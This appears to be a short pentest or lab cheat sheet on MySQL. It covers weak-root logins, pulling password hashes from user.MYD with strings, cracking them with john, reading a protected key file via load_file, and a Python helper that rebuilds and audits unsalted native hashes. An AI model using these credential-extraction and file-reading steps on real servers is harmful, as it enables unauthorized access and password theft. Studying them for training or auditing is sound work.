# MySQL

## Easy to Try

* Sometimes people leave no password set, or one that is easy to guess.

```
su mysql        # sometimes an actual user
mysql -u root   # see if you can get into mysql easily
                # easy guess: 'mysql' as the password!!
```

## Navigate

```
show databases;
use [DATABASE];
show tables;
select * from [TABLE];
```

## Strings MYD

```
> strings /var/lib/mysql/mysql/user.MYD   # might get you a password

localhost
root*D3240DFEFEDF838952C03D28
6c732c6044b7
root 127.0.0.1
root localhost
debian-sys-maint*D1461CE757B9B67AC344204A3A7FE9F9DB17A35C
68B0F4D12A2A1885

# Stitch the two hash fragments together and save the line to lab.txt:
root:*D3240DFEFEDF838952C03D2868B0F4D12A2A1885

john ./lab.txt
root18  # cracked!
```
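
The stitched value above has the `mysql_native_password` layout: `*` followed by 40 hex digits of SHA1(SHA1(password)), with no salt. As an added example (not part of the original notes), this Python sketch reassembles fragments from `strings` output, rejects a bad stitch, and audits your own accounts against a short weak-password list; the `app` account and the wordlist are constructed sample data.

```python
import hashlib
import re

# mysql_native_password: '*' followed by 40 uppercase hex digits.
HASH_RE = re.compile(r"\*[0-9A-F]{40}")


def native_hash(password):
    """Return '*' + HEX(SHA1(SHA1(password))); the scheme uses no salt."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def stitch(fragments):
    """Join pieces that strings printed on separate lines; reject a bad join."""
    candidate = "".join(f.strip() for f in fragments).upper()
    if not HASH_RE.fullmatch(candidate):
        raise ValueError("not a 41-character native hash: %r" % candidate)
    return candidate


def audit(accounts, wordlist):
    """Return {user: password} for every account whose hash is in the wordlist."""
    table = {native_hash(word): word for word in wordlist}
    return {user: table[h] for user, h in accounts.items() if h in table}


if __name__ == "__main__":
    # Constructed sample: an account using the page's "easy guess" password,
    # with its hash split in two the way strings split the rows above.
    full = native_hash("mysql")
    accounts = {"app": stitch([full[:25], full[25:]])}
    print(audit(accounts, ["root", "toor", "mysql", "password"]))
    try:
        # Pulling in a stray line between the two halves fails validation.
        stitch([full[:25], "6c732c6044b7", full[25:]])
    except ValueError as err:
        print("rejected:", err)
```

Because the hash is unsalted, the same password yields the same hash on every server, which is why read access to `user.MYD` should be limited to the `mysql` service account.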

## PrivEsc

Privesc to read a file you shouldn't have access to!
Some of this is locked down in later releases of MySQL, but worth checking!!

```

>> mysql -u root
>> select load_file('/var/lib/mysql-files/key.txt');
+-------------------------------------------+
| load_file('/var/lib/mysql-files/key.txt') |
+-------------------------------------------+
| 4234db90-01c6-4f10-8c81-8c0017107fc7
```
